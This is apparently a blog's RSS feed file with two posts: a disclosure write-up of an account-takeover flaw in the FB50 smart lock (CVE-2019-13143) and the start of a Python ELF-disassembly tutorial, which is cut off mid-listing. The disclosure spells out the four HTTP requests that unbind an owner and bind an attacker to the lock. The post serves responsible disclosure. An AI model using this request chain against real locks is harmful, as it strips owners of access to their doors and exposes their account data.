all repos — site @ 4c05825eacc65aeb1eb5d091da263a59aded6ce5

source for my site, found at icyphox.sh

build/blog/feed.xml (view raw)

 1
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
 100
 101
 102
 103
 104
 105
 106
 107
 108
 109
 110
 111
 112
 113
 114
 115
 116
 117
 118
 119
 120
 121
 122
 123
 124
 125
 126
 127
 128
 129
 130
 131
 132
 133
 134
 135
 136
 137
 138
 139
 140
 141
 142
 143
 144
 145
 146
 147
 148
 149
 150
 151
 152
 153
 154
 155
 156
 157
 158
 159
 160
 161
 162
 163
 164
 165
 166
 167
 168
 169
 170
 171
 172
 173
 174
 175
 176
 177
 178
 179
 180
 181
 182
 183
 184
 185
 186
 187
 188
 189
 190
 191
 192
 193
 194
 195
 196
 197
 198
 199
 200
 201
 202
 203
 204
 205
 206
 207
 208
 209
 210
 211
 212
 213
 214
 215
 216
 217
 218
 219
 220
 221
 222
 223
 224
 225
 226
 227
 228
 229
 230
 231
 232
 233
 234
 235
 236
 237
 238
 239
 240
 241
 242
 243
 244
 245
 246
 247
 248
 249
 250
 251
 252
 253
 254
 255
 256
 257
 258
 259
 260
 261
 262
 263
 264
 265
 266
 267
 268
 269
 270
 271
 272
 273
 274
 275
 276
 277
 278
 279
 280
 281
 282
 283
 284
 285
 286
 287
 288
 289
 290
 291
 292
 293
 294
 295
 296
 297
 298
 299
 300
 301
 302
 303
 304
 305
 306
 307
 308
 309
 310
 311
 312
 313
 314
 315
 316
 317
 318
 319
 320
 321
 322
 323
 324
 325
 326
 327
 328
 329
 330
 331
 332
 333
 334
 335
 336
 337
 338
 339
 340
 341
 342
 343
 344
 345
 346
 347
 348
 349
 350
 351
 352
 353
 354
 355
 356
 357
 358
 359
 360
 361
 362
 363
 364
 365
 366
 367
 368
 369
 370
 371
 372
 373
 374
 375
 376
 377
 378
 379
 380
 381
 382
 383
 384
 385
 386
 387
 388
 389
 390
 391
 392
 393
 394
 395
 396
 397
 398
 399
 400
 401
 402
 403
 404
 405
 406
 407
 408
 409
 410
 411
 412
 413
 414
 415
 416
 417
 418
 419
 420
 421
 422
 423
 424
 425
 426
 427
 428
 429
 430
 431
 432
 433
 434
 435
 436
 437
 438
 439
 440
 441
 442
 443
 444
 445
 446
 447
 448
 449
 450
 451
 452
 453
 454
 455
 456
 457
 458
 459
 460
 461
 462
 463
 464
 465
 466
 467
 468
 469
 470
 471
 472
 473
 474
 475
 476
 477
 478
 479
 480
 481
 482
 483
 484
 485
 486
 487
 488
 489
 490
 491
 492
 493
 494
 495
 496
 497
 498
 499
 500
 501
 502
 503
 504
 505
 506
 507
 508
 509
 510
 511
 512
 513
 514
 515
 516
 517
 518
 519
 520
 521
 522
 523
 524
 525
 526
 527
 528
 529
 530
 531
 532
 533
 534
 535
 536
 537
 538
 539
 540
 541
 542
 543
 544
 545
 546
 547
 548
 549
 550
 551
 552
 553
 554
 555
 556
 557
 558
 559
 560
 561
 562
 563
 564
 565
 566
 567
 568
 569
 570
 571
 572
 573
 574
 575
 576
 577
 578
 579
 580
 581
 582
 583
 584
 585
 586
 587
 588
 589
 590
 591
 592
 593
 594
 595
 596
 597
 598
 599
 600
 601
 602
 603
 604
 605
 606
 607
 608
 609
 610
 611
 612
 613
 614
 615
 616
 617
 618
 619
 620
 621
 622
 623
 624
 625
 626
 627
 628
 629
 630
 631
 632
 633
 634
 635
 636
 637
 638
 639
 640
 641
 642
 643
 644
 645
 646
 647
 648
 649
 650
 651
 652
 653
 654
 655
 656
 657
 658
 659
 660
 661
 662
 663
 664
 665
 666
 667
 668
 669
 670
 671
 672
 673
 674
 675
 676
 677
 678
 679
 680
 681
 682
 683
 684
 685
 686
 687
 688
 689
 690
 691
 692
 693
 694
 695
 696
 697
 698
 699
 700
 701
 702
 703
 704
 705
 706
 707
 708
 709
 710
 711
 712
 713
 714
 715
 716
 717
 718
 719
 720
 721
 722
 723
 724
 725
 726
 727
 728
 729
 730
 731
 732
 733
 734
 735
 736
 737
 738
 739
 740
 741
 742
 743
 744
 745
 746
 747
 748
 749
 750
 751
 752
 753
 754
 755
 756
 757
 758
 759
 760
 761
 762
 763
 764
 765
 766
 767
 768
 769
 770
 771
 772
 773
 774
 775
 776
 777
 778
 779
 780
 781
 782
 783
 784
 785
 786
 787
 788
 789
 790
 791
 792
 793
 794
 795
 796
 797
<?xml version='1.0' encoding='UTF-8'?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>icyphox's blog</title>
	<link>https://icyphox.sh/blog/</link>
    <description>icyphox's blog</description>
	<atom:link href="https://icyphox.sh/blog/feed.xml" rel="self" type="application/xml"/>
    <image>
      <url>https://icyphox.sh/icyphox.png</url>
    </image>
    <language>en-us</language>
	<copyright>Creative Commons BY-NC-SA 4.0</copyright>
<item>
      <title>Picking the FB50 smart lock (CVE-2019-13143)</title>
	  <link>https://icyphox.sh/blog/fb50/</link>
      <description>&lt;h1 id=&quot;picking-the-fb50-smart-lock-cve-2019-13143&quot;&gt;Picking the FB50 smart lock (CVE-2019-13143)&lt;/h1&gt;

&lt;h2 id=&quot;and-lessons-learnt-in-iot-security&quot;&gt;… and lessons learnt in IoT security&lt;/h2&gt;

&lt;p&gt;(&lt;em&gt;originally posted at &lt;a href=&quot;http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure&quot;&gt;SecureLayer7&amp;#8217;s Blog&lt;/a&gt;, with my edits&lt;/em&gt;)&lt;/p&gt;

&lt;h3 id=&quot;the-lock&quot;&gt;The lock&lt;/h3&gt;

&lt;p&gt;The lock in question is the FB50 smart lock, manufactured by Shenzhen
Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
across many ecommerce sites, and has over, an estimated, 15k+ users.&lt;/p&gt;

&lt;p&gt;The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
the Play/App Store to function. The app requires the user to create an
account before further functionality is available. 
It also facilitates configuring the fingerprint,
and unlocking from a range via Bluetooth.&lt;/p&gt;

&lt;p&gt;We had two primary attack surfaces we decided to tackle — Bluetooth (BLE)
and the Android app.&lt;/p&gt;

&lt;h3 id=&quot;via-bluetooth-low-energy-ble&quot;&gt;Via Bluetooth Low Energy (BLE)&lt;/h3&gt;

&lt;p&gt;Android phones have the ability to capture Bluetooth (HCI) traffic
which can be enabled under Developer Options under Settings. We made 
around 4 &amp;#8220;unlocks&amp;#8221; from the Android phone, as seen in the screenshot.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/bt_wireshark.png&quot; alt=&quot;wireshark packets&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This is the value sent in the &lt;code&gt;Write&lt;/code&gt; request:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/static/img/bt_ws_value.png&quot; alt=&quot;wireshark write req&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We attempted replaying these requests using &lt;code&gt;gattool&lt;/code&gt; and &lt;code&gt;gattacker&lt;/code&gt;,
but that didn&amp;#8217;t pan out, since the value being written was encrypted.&lt;sup class=&quot;footnote-ref&quot; id=&quot;fnref-1&quot;&gt;&lt;a href=&quot;#fn-1&quot;&gt;1&lt;/a&gt;&lt;/sup&gt;&lt;/p&gt;

&lt;h3 id=&quot;via-the-android-app&quot;&gt;Via the Android app&lt;/h3&gt;

&lt;p&gt;Reversing the app using &lt;code&gt;jd-gui&lt;/code&gt;, &lt;code&gt;apktool&lt;/code&gt; and &lt;code&gt;dex2jar&lt;/code&gt; didn&amp;#8217;t get us too
far since most of it was obfuscated. Why bother when there exists an 
easier approach &amp;#8211; BurpSuite.&lt;/p&gt;

&lt;p&gt;We captured and played around with a bunch of requests and responses,
and finally arrived at a working exploit chain.&lt;/p&gt;

&lt;h3 id=&quot;the-exploit&quot;&gt;The exploit&lt;/h3&gt;

&lt;p&gt;The entire exploit is a 4 step process consisting of authenticated 
HTTP requests:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Using the lock&amp;#8217;s MAC (obtained via a simple Bluetooth scan in the 
vicinity), get the barcode and lock ID&lt;/li&gt;
&lt;li&gt;Using the barcode, fetch the user ID&lt;/li&gt;
&lt;li&gt;Using the lock ID and user ID, unbind the user from the lock&lt;/li&gt;
&lt;li&gt;Provide a new name, attacker&amp;#8217;s user ID and the MAC to bind the attacker
to the lock&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is what it looks like, in essence (personal info redacted).&lt;/p&gt;

&lt;h4 id=&quot;request-1&quot;&gt;Request 1&lt;/h4&gt;

&lt;pre&gt;&lt;code&gt;POST /oklock/lock/queryDevice
{&quot;mac&quot;:&quot;XX:XX:XX:XX:XX:XX&quot;}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Response:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;{
   &quot;result&quot;:{
      &quot;alarm&quot;:0,
      &quot;barcode&quot;:&quot;&amp;lt;BARCODE&amp;gt;&quot;,
      &quot;chipType&quot;:&quot;1&quot;,
      &quot;createAt&quot;:&quot;2019-05-14 09:32:23.0&quot;,
      &quot;deviceId&quot;:&quot;&quot;,
      &quot;electricity&quot;:&quot;95&quot;,
      &quot;firmwareVersion&quot;:&quot;2.3&quot;,
      &quot;gsmVersion&quot;:&quot;&quot;,
      &quot;id&quot;:&amp;lt;LOCK ID&amp;gt;,
      &quot;isLock&quot;:0,
      &quot;lockKey&quot;:&quot;69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95&quot;,
      &quot;lockPwd&quot;:&quot;000000&quot;,
      &quot;mac&quot;:&quot;XX:XX:XX:XX:XX:XX&quot;,
      &quot;name&quot;:&quot;lock&quot;,
      &quot;radioName&quot;:&quot;BlueFPL&quot;,
      &quot;type&quot;:0
   },
   &quot;status&quot;:&quot;2000&quot;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;request-2&quot;&gt;Request 2&lt;/h4&gt;

&lt;pre&gt;&lt;code&gt;POST /oklock/lock/getDeviceInfo

{&quot;barcode&quot;:&quot;https://app.oklok.com.cn/app.html?id=&amp;lt;BARCODE&amp;gt;&quot;}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Response:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;   &quot;result&quot;:{
      &quot;account&quot;:&quot;email@some.website&quot;,
      &quot;alarm&quot;:0,
      &quot;barcode&quot;:&quot;&amp;lt;BARCODE&amp;gt;&quot;,
      &quot;chipType&quot;:&quot;1&quot;,
      &quot;createAt&quot;:&quot;2019-05-14 09:32:23.0&quot;,
      &quot;deviceId&quot;:&quot;&quot;,
      &quot;electricity&quot;:&quot;95&quot;,
      &quot;firmwareVersion&quot;:&quot;2.3&quot;,
      &quot;gsmVersion&quot;:&quot;&quot;,
      &quot;id&quot;:&amp;lt;LOCK ID&amp;gt;,
      &quot;isLock&quot;:0,
      &quot;lockKey&quot;:&quot;69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95&quot;,
      &quot;lockPwd&quot;:&quot;000000&quot;,
      &quot;mac&quot;:&quot;XX:XX:XX:XX:XX:XX&quot;,
      &quot;name&quot;:&quot;lock&quot;,
      &quot;radioName&quot;:&quot;BlueFPL&quot;,
      &quot;type&quot;:0,
      &quot;userId&quot;:&amp;lt;USER ID&amp;gt;
   }
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;request-3&quot;&gt;Request 3&lt;/h4&gt;

&lt;pre&gt;&lt;code&gt;POST /oklock/lock/unbind

{&quot;lockId&quot;:&quot;&amp;lt;LOCK ID&amp;gt;&quot;,&quot;userId&quot;:&amp;lt;USER ID&amp;gt;}
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;request-4&quot;&gt;Request 4&lt;/h4&gt;

&lt;pre&gt;&lt;code&gt;POST /oklock/lock/bind

{&quot;name&quot;:&quot;newname&quot;,&quot;userId&quot;:&amp;lt;USER ID&amp;gt;,&quot;mac&quot;:&quot;XX:XX:XX:XX:XX:XX&quot;}
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;thats-it-the-scary-stuff&quot;&gt;That&amp;#8217;s it! (&amp;amp; the scary stuff)&lt;/h3&gt;

&lt;p&gt;You should have the lock transferred to your account. The severity of this
issue lies in the fact that the original owner completely loses access to
their lock. They can&amp;#8217;t even &amp;#8220;rebind&amp;#8221; to get it back, since the current owner 
(the attacker) needs to authorize that. &lt;/p&gt;

&lt;p&gt;To add to that, roughly 15,000 user accounts&amp;#8217; info are exposed via IDOR.
Ilja, a cool dude I met on Telegram, noticed locks named &amp;#8220;carlock&amp;#8221;, 
&amp;#8220;garage&amp;#8221;, &amp;#8220;MainDoor&amp;#8221;, etc.&lt;sup class=&quot;footnote-ref&quot; id=&quot;fnref-2&quot;&gt;&lt;a href=&quot;#fn-2&quot;&gt;2&lt;/a&gt;&lt;/sup&gt; This is terrifying.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;shudders&lt;/em&gt;&lt;/p&gt;

&lt;h3 id=&quot;proof-of-concept&quot;&gt;Proof of Concept&lt;/h3&gt;

&lt;p&gt;&lt;a href=&quot;https://twitter.com/icyphox/status/1158396372778807296&quot;&gt;PoC Video&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/icyphox/pwnfb50&quot;&gt;Exploit code&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;disclosure-timeline&quot;&gt;Disclosure timeline&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;26th June, 2019&lt;/strong&gt;: Issue discovered at SecureLayer7, Pune&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;27th June, 2019&lt;/strong&gt;: Vendor notified about the issue&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2nd July, 2019&lt;/strong&gt;: CVE-2019-13143 reserved&lt;/li&gt;
&lt;li&gt;No response from vendor&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;2nd August 2019&lt;/strong&gt;: Public disclosure&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;lessons-learnt&quot;&gt;Lessons learnt&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;DO NOT&lt;/strong&gt;. Ever. Buy. A smart lock. You&amp;#8217;re better off with the &amp;#8220;dumb&amp;#8221; ones
with keys. With the IoT plague spreading, it brings in a large attack surface
to things that were otherwise &amp;#8220;unhackable&amp;#8221; (try hacking a &amp;#8220;dumb&amp;#8221; toaster).&lt;/p&gt;

&lt;p&gt;The IoT security scene is rife with bugs from over 10 years ago, like
executable stack segments&lt;sup class=&quot;footnote-ref&quot; id=&quot;fnref-3&quot;&gt;&lt;a href=&quot;#fn-3&quot;&gt;3&lt;/a&gt;&lt;/sup&gt;, hardcoded keys, and poor development 
practices in general.&lt;/p&gt;

&lt;p&gt;Our existing threat models and scenarios have to be updated to factor 
in these new exploitation possibilities. This also broadens the playing 
field for cyber warfare and mass surveillance campaigns. &lt;/p&gt;

&lt;h3 id=&quot;researcher-info&quot;&gt;Researcher info&lt;/h3&gt;

&lt;p&gt;This research was done at &lt;a href=&quot;https://securelayer7.net&quot;&gt;SecureLayer7&lt;/a&gt;, Pune, IN by:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Anirudh Oppiliappan (me)&lt;/li&gt;
&lt;li&gt;S. Raghav Pillai (&lt;a href=&quot;https://twitter.com/_vologue&quot;&gt;@_vologue&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;Shubham Chougule (&lt;a href=&quot;https://twitter.com/shubhamtc&quot;&gt;@shubhamtc&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;div class=&quot;footnotes&quot;&gt;
&lt;hr /&gt;
&lt;ol&gt;
&lt;li id=&quot;fn-1&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/&quot;&gt;This&lt;/a&gt; article discusses a similar smart lock, but they broke the encryption.&amp;#160;&lt;a href=&quot;#fnref-1&quot; class=&quot;footnoteBackLink&quot; title=&quot;Jump back to footnote 1 in the text.&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;

&lt;li id=&quot;fn-2&quot;&gt;
&lt;p&gt;Thanks to Ilja Shaposhnikov (@drakylar).&amp;#160;&lt;a href=&quot;#fnref-2&quot; class=&quot;footnoteBackLink&quot; title=&quot;Jump back to footnote 2 in the text.&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;

&lt;li id=&quot;fn-3&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf&quot;&gt;PDF&lt;/a&gt;&amp;#160;&lt;a href=&quot;#fnref-3&quot; class=&quot;footnoteBackLink&quot; title=&quot;Jump back to footnote 3 in the text.&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
</description>
      <pubDate>Mon, 05 Aug 2019 00:00:00 +0000</pubDate>
      <guid>https://icyphox.sh/blog/fb50/</guid>
</item>
<item>
      <title>Python for Reverse Engineering #1: ELF Binaries</title>
	  <link>https://icyphox.sh/blog/python-for-re-1</link>
      <description>&lt;h1 id=&quot;python-for-reverse-engineering-1-elf-binaries&quot;&gt;Python for Reverse Engineering 1: ELF Binaries&lt;/h1&gt;

&lt;h2 id=&quot;building-your-own-disassembly-tooling-for-thats-right-fun-and-profit&quot;&gt;Building your own disassembly tooling for — that’s right — fun and profit&lt;/h2&gt;

&lt;p&gt;While solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.&lt;/p&gt;

&lt;p&gt;Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually build your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.&lt;/p&gt;

&lt;h3 id=&quot;setup&quot;&gt;Setup&lt;/h3&gt;

&lt;p&gt;As the title suggests, you’re going to need a Python 3 interpreter before
anything else. Once you’ve confirmed beyond reasonable doubt that you do,
in fact, have a Python 3 interpreter installed on your system, run&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ pip install capstone pyelftools
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;where &lt;code&gt;capstone&lt;/code&gt; is the disassembly engine we’ll be scripting with and &lt;code&gt;pyelftools&lt;/code&gt; to help parse ELF files.&lt;/p&gt;

&lt;p&gt;With that out of the way, let’s start with an example of a basic reversing
challenge.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;/* chall.c */

#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;

int main() {
   char *pw = malloc(9);
   pw[0] = &#x27;a&#x27;;
   for(int i = 1; i &amp;lt;= 8; i++){
       pw[i] = pw[i - 1] + 1;
   }
   pw[9] = &#x27;\0&#x27;;
   char *in = malloc(10);
   printf(&quot;password: &quot;);
   fgets(in, 10, stdin);        // &#x27;abcdefghi&#x27;
   if(strcmp(in, pw) == 0) {
       printf(&quot;haha yes!\n&quot;);
   }
   else {
       printf(&quot;nah dude\n&quot;);
   }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Compile it with GCC/Clang:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;$ gcc chall.c -o chall.elf
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;scripting&quot;&gt;Scripting&lt;/h3&gt;

&lt;p&gt;For starters, let’s look at the different sections present in the binary.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# sections.py

from elftools.elf.elffile import ELFFile

with open(&#x27;./chall.elf&#x27;, &#x27;rb&#x27;) as f:
    e = ELFFile(f)
    for section in e.iter_sections():
        print(hex(section[&#x27;sh_addr&#x27;]), section.name)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;This script iterates through all the sections and also shows us where it’s loaded. This will be pretty useful later. Running it gives us&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;› python sections.py
0x238 .interp
0x254 .note.ABI-tag
0x274 .note.gnu.build-id
0x298 .gnu.hash
0x2c0 .dynsym
0x3e0 .dynstr
0x484 .gnu.version
0x4a0 .gnu.version_r
0x4c0 .rela.dyn
0x598 .rela.plt
0x610 .init
0x630 .plt
0x690 .plt.got
0x6a0 .text
0x8f4 .fini
0x900 .rodata
0x924 .eh_frame_hdr
0x960 .eh_frame
0x200d98 .init_array
0x200da0 .fini_array
0x200da8 .dynamic
0x200f98 .got
0x201000 .data
0x201010 .bss
0x0 .comment
0x0 .symtab
0x0 .strtab
0x0 .shstrtab
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Most of these aren’t relevant to us, but a few sections here are to be noted. The &lt;code&gt;.text&lt;/code&gt; section contains the instructions (opcodes) that we’re after. The &lt;code&gt;.data&lt;/code&gt; section should have strings and constants initialized at compile time. Finally, the &lt;code&gt;.plt&lt;/code&gt; which is the Procedure Linkage Table and the &lt;code&gt;.got&lt;/code&gt;, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.&lt;/p&gt;

&lt;p&gt;Since we know that the &lt;code&gt;.text&lt;/code&gt; section has the opcodes, let’s disassemble the binary starting at that address.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# disas1.py

from elftools.elf.elffile import ELFFile
from capstone import *

with open(&#x27;./bin.elf&#x27;, &#x27;rb&#x27;) as f:
    elf = ELFFile(f)
    code = elf.get_section_by_name(&#x27;.text&#x27;)
    ops = code.data()
    addr = code[&#x27;sh_addr&#x27;]
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(ops, addr):        
        print(f&#x27;0x{i.address:x}:\t{i.mnemonic}\t{i.op_str}&#x27;)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The code is fairly straightforward (I think). We should be seeing this, on running&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;› python disas1.py | less      
0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
0x6bd: lea rdi, [rip + 0xe6]
**0x6c4: call qword ptr [rip + 0x200916]**
0x6ca: hlt
... snip ...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The line in bold is fairly interesting to us. The address at &lt;code&gt;[rip + 0x200916]&lt;/code&gt; is equivalent to &lt;code&gt;[0x6ca + 0x200916]&lt;/code&gt;, which in turn evaluates to &lt;code&gt;0x200fe0&lt;/code&gt;. The first &lt;code&gt;call&lt;/code&gt; being made to a function at &lt;code&gt;0x200fe0&lt;/code&gt;? What could this function be?&lt;/p&gt;

&lt;p&gt;For this, we will have to look at &lt;strong&gt;relocations&lt;/strong&gt;. Quoting &lt;a href=&quot;http://refspecs.linuxbase.org/elf/gabi4+/ch4.reloc.html&quot;&gt;linuxbase.org&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have “relocation entries’’ which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;To try and find these relocation entries, we write a third script.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;# relocations.py

import sys
from elftools.elf.elffile import ELFFile
from elftools.elf.relocation import RelocationSection

with open(&#x27;./chall.elf&#x27;, &#x27;rb&#x27;) as f:
    e = ELFFile(f)
    for section in e.iter_sections():
        if isinstance(section, RelocationSection):
            print(f&#x27;{section.name}:&#x27;)
            symbol_table = e.get_section(section[&#x27;sh_link&#x27;])
            for relocation in section.iter_relocations():
                symbol = symbol_table.get_symbol(relocation[&#x27;r_info_sym&#x27;])
                addr = hex(relocation[&#x27;r_offset&#x27;])
                print(f&#x27;{symbol.name} {addr}&#x27;)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Let’s run through this code real quick. We first loop through the sections, and check if it’s of the type &lt;code&gt;RelocationSection&lt;/code&gt;. We then iterate through the relocations from the symbol table for each section. Finally, running this gives us&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;› python relocations.py
.rela.dyn:
 0x200d98
 0x200da0
 0x201008
_ITM_deregisterTMCloneTable 0x200fd8
**__libc_start_main 0x200fe0**
__gmon_start__ 0x200fe8
_ITM_registerTMCloneTable 0x200ff0
__cxa_finalize 0x200ff8
stdin 0x201010
.rela.plt:
puts 0x200fb0
printf 0x200fb8
fgets 0x200fc0
strcmp 0x200fc8
malloc 0x200fd0
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Remember the function call at &lt;code&gt;0x200fe0&lt;/code&gt; from earlier? Yep, so that was a call to the well known &lt;code&gt;__libc_start_main&lt;/code&gt;. Again, according to &lt;a href=&quot;http://refspecs.linuxbase.org/LSB_3.1.0/LSB-generic/LSB-generic/baselib&amp;#8212;libc-start-main-.html&quot;&gt;linuxbase.org&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;The &lt;code&gt;__libc_start_main()&lt;/code&gt; function shall perform any necessary initialization of the execution environment, call the &lt;em&gt;main&lt;/em&gt; function with appropriate arguments, and handle the return from &lt;code&gt;main()&lt;/code&gt;. If the &lt;code&gt;main()&lt;/code&gt; function returns, the return value shall be passed to the &lt;code&gt;exit()&lt;/code&gt; function.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;And its definition is like so&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;int __libc_start_main(int *(main) (int, char * *, char * *), 
int argc, char * * ubp_av, 
void (*init) (void), 
void (*fini) (void), 
void (*rtld_fini) (void), 
void (* stack_end));
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Looking back at our disassembly&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;0x6a0: xor ebp, ebp
0x6a2: mov r9, rdx
0x6a5: pop rsi
0x6a6: mov rdx, rsp
0x6a9: and rsp, 0xfffffffffffffff0
0x6ad: push rax
0x6ae: push rsp
0x6af: lea r8, [rip + 0x23a]
0x6b6: lea rcx, [rip + 0x1c3]
**0x6bd: lea rdi, [rip + 0xe6]**
0x6c4: call qword ptr [rip + 0x200916]
0x6ca: hlt
... snip ...
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;but this time, at the &lt;code&gt;lea&lt;/code&gt; or Load Effective Address instruction, which loads some address &lt;code&gt;[rip + 0xe6]&lt;/code&gt; into the &lt;code&gt;rdi&lt;/code&gt; register. &lt;code&gt;[rip + 0xe6]&lt;/code&gt; evaluates to &lt;code&gt;0x7aa&lt;/code&gt; which happens to be the address of our &lt;code&gt;main()&lt;/code&gt; function! How do I know that? Because &lt;code&gt;__libc_start_main()&lt;/code&gt;, after doing whatever it does, eventually jumps to the function at &lt;code&gt;rdi&lt;/code&gt;, which is generally the &lt;code&gt;main()&lt;/code&gt; function. It looks something like this&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://cdn-images-1.medium.com/max/800/0*oQA2MwHjhzosF8ZH.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;To see the disassembly of &lt;code&gt;main&lt;/code&gt;, seek to &lt;code&gt;0x7aa&lt;/code&gt; in the output of the script we’d written earlier (&lt;code&gt;disas1.py&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;From what we discovered earlier, each &lt;code&gt;call&lt;/code&gt; instruction points to some function which we can see from the relocation entries. So following each &lt;code&gt;call&lt;/code&gt; into their relocations gives us this&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;printf 0x650
fgets  0x660
strcmp 0x670
malloc 0x680
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Putting all this together, things start falling into place. Let me highlight the key sections of the disassembly here. It’s pretty self-explanatory.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;0x7b2: mov edi, 0xa  ; 10
0x7b7: call 0x680    ; malloc
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;The loop to populate the &lt;code&gt;*pw&lt;/code&gt; string&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;0x7d0:  mov     eax, dword ptr [rbp - 0x14]
0x7d3:  cdqe    
0x7d5:  lea     rdx, [rax - 1]
0x7d9:  mov     rax, qword ptr [rbp - 0x10]
0x7dd:  add     rax, rdx
0x7e0:  movzx   eax, byte ptr [rax]
0x7e3:  lea     ecx, [rax + 1]
0x7e6:  mov     eax, dword ptr [rbp - 0x14]
0x7e9:  movsxd  rdx, eax
0x7ec:  mov     rax, qword ptr [rbp - 0x10]
0x7f0:  add     rax, rdx
0x7f3:  mov     edx, ecx
0x7f5:  mov     byte ptr [rax], dl
0x7f7:  add     dword ptr [rbp - 0x14], 1
0x7fb:  cmp     dword ptr [rbp - 0x14], 8
